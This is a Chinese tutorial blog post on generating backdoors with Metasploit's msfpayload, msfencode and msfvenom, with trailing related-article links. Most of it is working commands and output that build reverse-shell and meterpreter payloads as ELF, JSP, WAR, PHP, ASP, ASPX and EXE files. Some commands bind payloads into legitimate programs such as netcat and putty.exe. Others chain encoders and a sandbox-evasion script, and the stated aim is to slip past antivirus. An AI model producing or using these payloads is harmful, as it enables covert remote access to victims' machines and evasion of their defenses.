php backdoor creator encoder,使用Msfpayload和Msfencode生成backdoor

最新推荐文章于 2023-12-28 10:11:41 发布
最新推荐文章于 2023-12-28 10:11:41 发布
阅读量190 收藏
点赞数
文章标签: php backdoor creator encoder

目录

msfpayload与msfencode参数说明

2生成backdoor类型

2.1msfpayload生成linux backdoor

2.2msfpayload生成jsp、war backdoor

2.3msfpayload生成php backdoor

2.4msfpayload生成asp、aspx backdoor

2.5msfpayload生成exe backdoor

3msfpayload tips

本文介绍使用msfpayload生成后门,msfencode多payload进行编码处理使其免杀部分杀软.

msfpayload与msfencode参数说明

执行msfpayload -h查看都有哪些参数

?

Usage: /opt/metasploit/msf3/msfpayload [] [var=val] 

OPTIONS:

-h Help banner

-l List available payloads

#O--查看payload信息

#R--输出raw原始数据,可以被传输到另一个程序如msfencode或重定向到另一个文件

#C--输出c程序

执行msfencode -h查看都有哪些参数

?

root@bt:/opt/metasploit/msf3# msfencode -h

Usage: /opt/metasploit/msf3/msfencode

OPTIONS:

-a The architecture to encode as

-b The list of characters to avoid: '\x00\xff' //避免的字符

-c The number of times to encode the data //编码次数

-d Specify the directory in which to look for EXE templates

-e The encoder to use //选择使用哪种编码器

-h Help banner

-i Encode the contents of the supplied file path

-k Keep template working; run payload in new thread (use with -x)

-l List available encoders //列出所有可用的编码器

-m Specifies an additional module search path

-n Dump encoder information

-o The output file //输出文件

-p The platform to encode for

-s The maximum size of the encoded data

-t The output format: raw,ruby,rb,perl,pl,bash,sh,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vba-exe,vbs,loop-vbs,asp,aspx,war //输出文件的格式

-v Increase verbosity

-x Specify an alternate executable template

root@bt:/opt/metasploit/msf3# msfencode -l

Framework Encoders

==================

Name Rank Description

---- ---- -----------

cmd/generic_sh good Generic Shell Variable Substitution Command Encoder

cmd/ifs low Generic ${IFS} Substitution Command Encoder

cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder

generic/none normal The "none" Encoder

mipsbe/longxor normal XOR Encoder

mipsle/longxor normal XOR Encoder

php/base64 great PHP Base64 encoder

ppc/longxor normal PPC LongXOR Encoder

ppc/longxor_tag normal PPC LongXOR Encoder

sparc/longxor_tag normal SPARC DWORD XOR Encoder

x64/xor normal XOR Encoder

x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder

x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder

x86/avoid_utf8_tolower manual Avoid UTF8/tolower

x86/call4_dword_xor normal Call+4 Dword XOR Encoder

x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder

x86/context_stat manual stat(2)-based Context Keyed Payload Encoder

x86/context_time manual time(2)-based Context Keyed Payload Encoder

x86/countdown normal Single-byte XOR Countdown Encoder

x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder

x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder

x86/nonalpha low Non-Alpha Encoder

x86/nonupper low Non-Upper Encoder

x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder

x86/single_static_bit manual Single Static Bit

x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder

x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder

生成backdoor类型

可以生成asp、aspx、php、jsp、war、exe等多种类型,下面介绍的使用方法就不一一测试了.

msfpayload生成linux backdoor

?

root@bt:~# msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.7.102 LPORT=5555 X > linux2

Created by msfpayload (http://www.metasploit.com).

Payload: linux/x86/shell_reverse_tcp

Length: 71

Options: {"LHOST"=>"192.168.7.102", "LPORT"=>"5555"}

目标机器运行linux2,本机监听下端口,使用metasploit或者nc都行,测试如下图:

payload与可执行文件绑定运行,如netcat:

?

root@bt:~# msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LHOST=10.0.0.1 LPORT=5555 R | msfencode -a x86 -e x86/alpha_mixed -k -x /bin/netcat -t elf -o nc

[*] x86/alpha_mixed succeeded with size 204 (iteration=1)

高级点的payload meterpreter

?

root@bt:~# msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LHOST=10.0.0.1 LPORT=5555 R | msfencode -a x86 -e x86/alpha_mixed -k -x /bin/netcat -t elf -o nc

可以使用msfpayload -l | grep linux查找,选择合适自己的.

msfpayload生成jsp、war backdoor

?

root@bt:~# msfpayload java/jsp_shell_reverse_tcp LHOST=10.1.1.1 LPORT=5555 R > door.jsp

生成war格式后门

?

root@bt:~# msfpayload linux/x86/shell_reverse_tcp LHOST=10.0.0.1 LPORT=5555 W > door.war

Created by msfpayload (http://www.metasploit.com).

Payload: linux/x86/shell_reverse_tcp

Length: 71

Options: {"LHOST"=>"10.0.0.1", "LPORT"=>"5555"}

root@bt:~# unzip door.war

Archive: door.war

inflating: META-INF/MANIFEST.MF

creating: WEB-INF/

inflating: WEB-INF/web.xml

inflating: sbkuvbujlbr.jsp

inflating: sWDYKoedyqBMERb.txt

root@bt:~#

msfpayload生成php backdoor

?

root@bt:~# msfpayload php/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e php/base64 -t raw -o base64php.php

[*] php/base64 succeeded with size 1779 (iteration=1)

如果文件开头和结尾木有php的分界符,那么得自己手动gedit/vim base64php.php一下,在头尾加上即可,否则是不成功的.如图:

msfpayload生成asp、aspx backdoor

?

root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e x86/shikata_ga_nai -a x86 -t asp -o door2.asp

[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e x86/shikata_ga_nai -a x86 -t aspx -o door.aspx

[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

msfpayload生成exe backdoor

?

root@bt:~#msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=5555 R | msfencode -t exe -c 5 > /root/Desktop/door.exe

root@bt:~#msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=5555 R | msfencode -t exe -c 5 -k -x /root/putty.exe -o /root/Desktop/puttydoor.exe

root@bt:~#msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=5555 R | msfencode -e x86/shikata_ga_nai -t raw -a x86 -b '\x00\x0a\x0d' -c 10 X > shell.bin

root@bt:~#msfpayload windows/shell/reverse_tcp LHOST=10.0.0.1 LPORT=4443 EXITFUNC=thread R | msfencode -e x86/shikata_ga_nai -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t raw | msfencode -e x86/call4_dword_xor -c 2 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t raw | msfencode -e x86/call4_dword_xor -c 2 -t exe -o door.exe

msfpayload tips

目标是内网时,常用的payload选着如:

?

root@bt:~# msfpayload windows/meterpreter/reverse_tcp_allports LHOST=192.168.1.6 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -o allports.exe

root@bt:~# msfpayload windows/meterpreter/reverse_http LHOST=192.168.1.6 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -o httpports.exe

Antivirus Sandbox Evasion-ultimate-payload.pl

?

$ ./msfvenom -p windows/meterpreter/reverse_https -f raw LHOST=172.16.1.1 LPORT=443 \

| ./ultimate-payload.pl -t ultimate-payload-template1.exe -o /tmp/payload.exe

[*ultimate] Waiting for payload from STDIN

[*ultimate] Payload: read (size: 367)

[*ultimate] Payload: encode (new size: 1161)

[*ultimate] Template: read 94720 bytes from file

[*ultimate] Template: found pattern 'MY_PAYLOAD:' at position: 36928

[*ultimate] Output: add the begin of the template (size: 36928)

[*ultimate] Output: add the encoded payload (size: 1161)

[*ultimate] Output: add the end of the template (size: 18502)

[*ultimate] File '/tmp/payload.exe' generated (size: 94720)

reverse_https with basic authentication against proxy

msfvenom -p windows/meterpreter/reverse_https_proxy_basicauth \

-f exe LPORT=443 LHOST=172.16.99.1 PROXY_AUTH_USER=mylongusername \

PROXY_AUTH_PASS=mylongpassword123 > /tmp/msf.exe

还有对生成的payload加壳处理,如upx.

https://www.0x255.com/archives/64

weixin_39621975
关注
msf生成php木马,11.7 Weevely3生成网页木马、Backcookie后门生成工具、使用msf生成木马、一句话变形技巧和使用...
weixin_36005427的博客
03-27 1950
大马:代码量大,体积大,可以和一句话木马配合使用(先传一句话后传大马),一般同意被发现,可变形或伪装(编码、远程接入),主要功能:文件管理、,命令执行、数据库管理、清理木马、屑木马、收集信息、提权等。Webshell管理工具的介绍和使用:Webshell工具主要和一句话配合使用中国菜刀、中国蚁剑等Weevely3生成网页木马(基于python)python weevely.py -h python...
shell-backdoor:我创建了此脚本是为了帮助您更轻松地直接攻击网站上的index.php
04-05
如何使用shell后门 查找容易受到黑客攻击的目标网站。 在获得目标网站之后,我们进行了后门种植 植入后门后,我们在浏览器网址中拨打电话 例如,您可以在下面看到 壳后门indosec壮举penucuri
根据ip获取城市 php
01-17
根据ip获取城市 php,包含高德地图接口、搜狐接口、新浪接口、淘宝接口
PHP 二维数组根据某个字段排序
diandu3502的博客
06-29 274
二维数组根据某个字段排序有两种办法,一种是通过sort自己写代码,一种是直接用array_multisort排序函数 一. 手写arraysort PHP的一维数组排序函数: sort 对数组的值按照升序排列(rsort降序),不保留原始的键 ksort 对数组的键按照升序排列(krsort降序) 保留键值关系 asort 对数组的值按照升序排列(arsort降序),...
使用 JID 来进行 Java 对象的高性能序列化
weixin_34405557的博客
02-27 107
JID 是一个用来反序列化、更新和重新序列化 Map 对象,在 i5 2.53GHz 处理器的机器上,完成 10000 条目的操作仅需 4 毫秒。序列化和重新序列化的时间很大程度上依赖于表条目的大小和复杂度,增量式的序列化和反序列化用于达到高性能。 今天我试验了下使用 JID 进行 Java 对象的序列化过程,现将这个过程与大家分享,至于在何种场景下使用大家自己发挥。 首先 JID 依...
PHP使用Luhn算法校验信用卡及借记卡卡号
大智若愚的博客
06-22 1222
Luhn算法会通过校验码对一串数字进行验证,校验码通常会被加到这串数字的末尾处,从而得到一个完整的身份识别码。我们以数字“7992739871”为例,计算其校验位: 从校验位开始,从右往左,偶数位乘2(例如,7*2=14),然后将两位数字的个位与十位相加(例如,10:1+0=1,14:1+4=5); 把得到的数字加在一起(本例中得到67); 将数字的和取模10(本例中得到7),再用10去减(本例中得
工具查询Php backdoor-PHP文本站长工具箱-ppb.zip
03-10
【标题】"工具查询Php backdoor-PHP文本站长工具箱-ppb.zip"涉及到的主要内容是关于PHP后门检测及站长工具的使用。在网络安全领域,PHP后门(backdoor)是指黑客为了长期控制或者远程访问受害者的服务器,植入的一段...
工具查询Php backdoor-PHP文本站长工具箱-ppb.rar
最新发布
04-07
【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。...鼓励下载和使用,并欢迎大家互相学习,共同进步。
基于PHP的Mysql BackDoor PHP+Mysql服务器 后门.zip
07-22
标题中的“基于PHP的Mysql BackDoor PHP+Mysql服务器后门”暗示了这是一个关于利用PHP和MySQL数据库创建后门的教程或工具包。在这个场景中,“BackDoor”指的是非法或者非授权的通道,允许攻击者远程控制或访问...
PHP根据IP获取所在城市
02-24
PHP根据IP获取所在城市, 通过两种方式获取IP的城市 第一种能过SINA的接口 第二种使用纯真IP库存!(IP库已包含在压缩包内)
PHP 根据IP地址获取所在城市
11-20
PHP 根据IP地址获取所在城市
php 根据登陆者的ip获取所在城市
01-17
php 根据登陆者的ip获取所在城市;包含新浪接口;淘宝接口,搜狐接口
php通过ip地址获取城市信息
weixin_41771362的博客
09-26 415
下载qqwry.da $ip = '1.202.241.99'; $ip1num = 0; $ip2num = 0; $ipAddr1 = ""; $ipAddr2 = ""; $dat_path = storage_path().'\qqwry.dat'; //文件路径 if (!preg_m...
php二维数组根据字段排序
weixin_38008473的博客
02-16 184
【代码】php二维数组根据字段排序。
PHP二维数组根据某个字段排序
allen的博客
08-14 2652
PHP中二维数组根据某个字段排序有两种办法,一种是通过sort自己写代码,一种是直接用array_multisort排序函数。 一、自定义函数 PHP的一维数组排序函数: sort 对数组的值按照升序排列(rsort降序),不保留原始的键 ksort 对数组的键按照升序排列(krsort降序) 保留键值关系 asort 对数组的值按照升序排列(arsort降序),保留键值关系 实现方法: 取出要排序的值组成值数组(为一维数组),按要求对值进行排序(保持键值关系),遍历值数组,按照键对应赋值给结果.
php 二维数组排序,二维数组按照指定字段排序
一眼青苔
12-28 674
php对二维数组中 指定键进行排序。
php 获取ip地址信息_PHP根据IP地址获取所在城市具体实现
weixin_35866747的博客
03-08 416
class ipCity {/*** 根据ip地址获取对应所在城市* @param type $userip 用户IP地址* @return string*/public function getCity( $userip, $dat_path = '' ) {//IP数据库路径,这里用的是QQ IP数据库 20110405 纯真版empty( $dat_path ) && $da...
UVM_BACKDOOR是什么
12-05
因此,可以将UVM_BACKDOOR看作是一种使用uvm_bitstream_t数据类型在UVM组件之间传递数据的方法。 另外,引用中提到了uvm_config_db可以传递不同类型的参数,但是并没有提到UVM_BACKDOOR。 综上所述,UVM_BACKDOOR...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值